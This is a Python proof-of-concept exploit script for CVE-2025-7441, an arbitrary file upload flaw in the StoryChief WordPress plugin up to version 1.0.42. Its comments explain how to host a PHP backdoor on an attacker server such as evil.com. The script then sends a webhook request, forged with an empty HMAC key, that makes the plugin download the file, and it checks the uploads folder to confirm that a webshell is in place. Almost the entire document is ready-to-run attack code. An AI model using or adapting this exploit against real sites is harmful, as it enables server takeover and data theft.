# Exploit Title: StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload
# Exploit Author: xpl0dec
# Vendor Homepage: https://www.storychief.io/wordpress-content-scheduler
# Software Link: https://github.com/Story-Chief/wordpress/
# Version: <= 1.0.42
# Tested on: Linux
# CVE : CVE-2025-7441
# CVSS Score : 9.8


# Step to reproduce :
# 1. Create a file with the .php extension and fill it with:
# <?php
# header(“Content-Type: image/jpeg”);
# echo “<?php phpinfo(); ?>”;
# ?>
# 2. Adjust the echo phpinfo section as needed
# 3. Host it on a VPS/web server with the name you want to upload, for example backdoor.php
# 4. The second argument is the URL of the backdoor created earlier, e.g., http://evil.com/backdoor.php
# 5. Then run the exploit: python3 CVE-2025-7441.py <wordpress_url> <backdoor_url>

from datetime import datetime
import requests
import json
import hmac
import hashlib
import sys
import time
import os

def banner():
	print(r"""
  _   _  ____ _____ _   _ _____ _  __  ____    _ __   __
 | \ | |/ ___| ____| | | | ____| |/ / |  _ \  / \\ \ / /
 |  \| | |  _|  _| | |_| |  _| | ' /  | | | |/ _ \\ V /
 | |\  | |_| | |___|  _  | |___| . \  | |_| / ___ \| |
 |_| \_|\____|_____|_| |_|_____|_|\_\ |____/_/   \_\_|

  PoC exploit CVE-2025-7441 by xpl0dec
	""")

if __name__ == "__main__":
    banner()
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target_url> <backdoor_url>")
        sys.exit(1)

    url = sys.argv[1] + "/wp-json/storychief/webhook"

    dummy = {
        "meta": {
            "event": "publish"
        },
        "data": {
            "featured_image": {
                "data": {
                    "sizes": {
                        "full": sys.argv[2]
                    }
                }
            }
        }
    }

    json_string = json.dumps(dummy, separators=(',', ':'), ensure_ascii=True)
    json_string = json_string.replace("/", "\\/").encode()

    signature = hmac.new(
        "".encode(),
        json_string,
        digestmod=hashlib.sha256
    ).hexdigest()


    headers = {
        "Content-Type": "application/json"
    }

    payload = {
        "meta": {
            "mac" : signature,
            "event": "publish"
        },
        "data": {
            "featured_image": {
                "data": {
                    "sizes": {
                        "full": sys.argv[2]
                    }
                }
            }
        }
    }


    print("[+] get hmac... [+]")
    time.sleep(2)
    print("hmac : " + signature)


    response = requests.post(url, headers=headers, data=json.dumps(payload))

    if "permalink" in response.text:
        print("[+] Response Success [+]")
        time.sleep(2)
        print("[+] Check backdoor from uploaded... [+]")

    current_datetime = datetime.now()
    month = str(current_datetime.month).zfill(2)
    year = current_datetime.year
    file_backdoor = os.path.basename(sys.argv[2])

    get_backdoor = requests.get(sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")

    if get_backdoor.status_code == 200:
        print("[+] Exploitation Success [+]")
        time.sleep(2)
        print("webshell uploaded in : " + sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")